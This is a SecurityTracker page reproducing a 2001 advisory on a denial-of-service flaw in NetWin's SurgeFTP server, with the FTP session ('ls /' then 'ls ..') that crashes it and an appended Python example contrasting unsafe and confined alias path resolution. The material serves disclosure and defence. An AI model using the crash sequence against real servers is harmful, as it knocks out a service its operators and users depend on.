SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >  SurgeFTP
Vendors:   NetWin
Users Can Crash NetWin's SurgeFTP Server Via Local Access
SecurityTracker Alert ID:  1000984
SecurityTracker URL:  http://securitytracker.com/id/1000984
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 4 2001
Impact:   Denial of service via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): prior to 1.1h
Description:   A denial of service vulnerability in NetWin's SurgeFTP server allows a local user to crash the server.

SNS Research reports that a design issue in SurgeFTP's handling of the directory listing command creates a denial of service condition that any user with local or shell access to the host can trigger. A directory listing that succeeds (in the published session, a listing of the alias root "/") followed by a "malformed" listing request (a listing of "..", which the server resolves to "/..") crashes the server and resets the client's connection.

Impact:   A local user can crash the FTP server.
Solution:   Vendor has apparently released build v1.1h to correct the vulnerability. See ftp://ftp.netwinsite.com/pub/surgeftp/
Vendor URL:  www.netwinsite.com
Cause:   Input validation error
Underlying OS:  Linux (Any), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  SurgeFTP Denial of Service


Strumpf Noir Society Advisories
! Public release !
<--#


-= SurgeFTP Denial of Service =-

Release date: Thursday, March 1, 2001


Introduction:

NetWin's SurgeFTP is an easy to manage and reliable FTP server with
detailed reporting and easy to use management features.

SurgeFTP is available for both the Unix/Linux and Windows flavours of
operating systems from the vendor's site: http://www.netwinsite.com


Problem:

Due to a design issue in the SurgeFTP server, a denial of service
condition exists which could allow any user with local or shell
access to the host to crash the server. The problem resides in the
local handling of the directory listing command, which after first being
successfully initialized will die if followed by a "malformed" request.


Example:

# ftp localhost
Connected to testbak
220 SurgeFTP testbak (Version 1.0b)
User (testbak:(none)): anonymous
331 Password required for anonymous.
Password:
230- Alias      Real path       Access
230- /          /home           read
230 User anonymous logged in.
ftp> ls /
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/)
226 Transfer complete.
ftp> ls ..
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/..)
-> ftp get:Connection reset by peer


(..)


Solution:

Vendor has been notified and has verified the problem. Build v1.1h has
been released, which fixes this issue. It's available from
ftp://ftp.netwinsite.com/pub/surgeftp/


yadayadayada

Free sk8! (http://www.freesk8.org)

SNS Research is rfpolicy (http://www.wiretrip.net/rfp/policy.html)
compliant, all information is provided on AS IS basis.

EOF, but Strumpf Noir Society will return!
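The session in the advisory above lists the alias root "/" and then "..", which the server resolves to "/.." before it dies; SecurityTracker records the cause as an input validation error. The page does not say what inside SurgeFTP actually faults, so the Python below is an added illustration, not SurgeFTP's code and not a reproducer for the crash. It shows the path-confinement step an FTP server with an alias table should apply before it lists anything: a constructed alias table mirrors the login banner (virtual "/" mapped to real "/home"); resolve_unchecked is a hypothetical weak resolver that glues the real root onto the client path before normalizing, so ".." issued from "/" resolves to the host's real root; resolve_confined normalizes in the virtual namespace first, joins, and then verifies the real path is still under the alias root. The function names and the replayed command list are assumptions made for this example.

```python
"""Virtual-to-real path resolution for an FTP alias table: weak vs. confined.

Added illustration; not SurgeFTP's implementation. The alias table is
constructed from the advisory's login banner ("/" -> "/home", read).
"""
import posixpath

ALIAS_TABLE = {"/": "/home"}  # constructed: virtual root -> real path


def _virtual_join(cwd: str, path: str) -> str:
    """Apply a client path (absolute, or relative to cwd) in the virtual namespace."""
    return path if path.startswith("/") else posixpath.join(cwd, path)


def resolve_unchecked(path: str, cwd: str = "/") -> str:
    """Hypothetical weak resolver: glue the real root onto the client path, then normalize.

    Normalization runs on the real path, so the '..' of 'LIST ..' issued from '/'
    climbs out of /home and yields '/', the host's real root.
    """
    real = ALIAS_TABLE["/"] + _virtual_join(cwd, path)  # "/home" + "/.." -> "/home/.."
    return posixpath.normpath(real)                      # -> "/"


def resolve_confined(path: str, cwd: str = "/") -> str:
    """Hardened resolver: normalize in the virtual namespace, then join, then verify.

    posixpath.normpath clamps '/..' to '/', so no virtual path can name anything
    above the alias root. The final prefix check cannot fail for this table; it is
    kept so that a later change to alias handling cannot silently regress.
    """
    virtual = posixpath.normpath(_virtual_join(cwd, path))  # "/.." -> "/"
    root = posixpath.normpath(ALIAS_TABLE["/"])
    real = posixpath.normpath(posixpath.join(root, virtual.lstrip("/")))
    if real != root and not real.startswith(root + "/"):
        raise ValueError(f"refusing path outside alias root: {path!r} -> {real}")
    return real


def escapes_alias_root(real: str) -> bool:
    """True when a resolved real path lies outside the alias root."""
    root = ALIAS_TABLE["/"]
    return not (real == root or real.startswith(root + "/"))


def replay_session(resolver, commands, cwd="/"):
    """Resolve the argument of each LIST command in order, as the advisory's session does.

    Returns (command, real_path) pairs, with None for a path the resolver refused,
    so the weak and the confined resolver can be compared on the same input.
    """
    results = []
    for cmd in commands:
        try:
            results.append((cmd, resolver(cmd, cwd)))
        except ValueError:
            results.append((cmd, None))
    return results


# Constructed input mirroring the advisory's transcript: 'ls /' followed by 'ls ..'.
SESSION = ["/", ".."]

if __name__ == "__main__":
    for name, resolver in (("unchecked", resolve_unchecked), ("confined", resolve_confined)):
        for cmd, real in replay_session(resolver, SESSION):
            flag = "  <-- outside alias root" if real and escapes_alias_root(real) else ""
            print(f"{name:9} LIST {cmd:3} -> {real}{flag}")
```

The order of operations is the whole point: any server that appends the client path to the real root and only then canonicalizes has already let ".." name something outside the alias, whatever it does afterwards. Normalizing the virtual path first makes that impossible, and the prefix check after the join is cheap insurance.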

Copyright 2017, SecurityGlobal.net LLC